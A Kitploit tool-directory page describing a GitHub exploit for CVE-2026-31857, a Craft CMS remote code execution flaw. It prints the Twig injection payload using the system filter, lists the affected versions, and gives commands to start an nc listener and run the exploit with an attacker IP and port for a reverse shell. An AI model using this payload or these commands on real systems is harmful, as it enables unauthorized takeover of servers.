Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-31857 — Craft CMS RCE via relational conditionals in the control panel | Kitploit
Tools/GitHubGitHub/0xtatsuki/cve-2026-31857
Vulnerability AnalysisExploitationWeb Application ExploitationPost-ExploitationWeb SecurityPenetration TestingRed TeamingRemote Access ToolPayload Development
GitHub0xtatsuki/cve-2026-31857

CVE-2026-31857

Craft CMS RCE via relational conditionals in the control panel

1 day agoNot yet reviewed
View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-31857 - Craft CMS RCE exploit

Python exploit for a RCE vulnerability in the Craft CMS admin panel, triggered via the admin/actions/element-indexes/count-elements endpoint. The injection goes through the elementIds field of a RelatedToConditionRule condition, which gets interpreted as Twig server-side and abused via the system filter to execute an arbitrary command ({{[['<cmd>']|filter('system')]}}).

Vulnerability disclosed by NeoSprings

Affected versions :

  • >= 5.0.0-RC1, <= 5.9.8
  • >= 4.0.0-beta.1, <= 4.17.3

References :

  • https://github.com/craftcms/cms/security/advisories/GHSA-fp5j-j7j4-mcxc
  • https://nvd.nist.gov/vuln/detail/cve-2026-31857

Installation

$ git clone https://github.com/0xTatsuki/CVE-2026-31857.git
$ cd CVE-2026-31857
$ pip install -r requirements.txt

Usage

  1. Start the listener before running the exploit :
$ nc -lvnp <attacker_port>
  1. Run the exploit :
$ python3 CVE-2026-31857.py -t http://<craftcms_base_url> -u <username> -p <password> -i <attacker_ip> -P <attacker_port>

Disclaimer

This tool is provided for educational purposes and authorized exercises only (CTF, contracted penetration testing or local testing). Using it against any system without explicit authorization is illegal.

Download Tool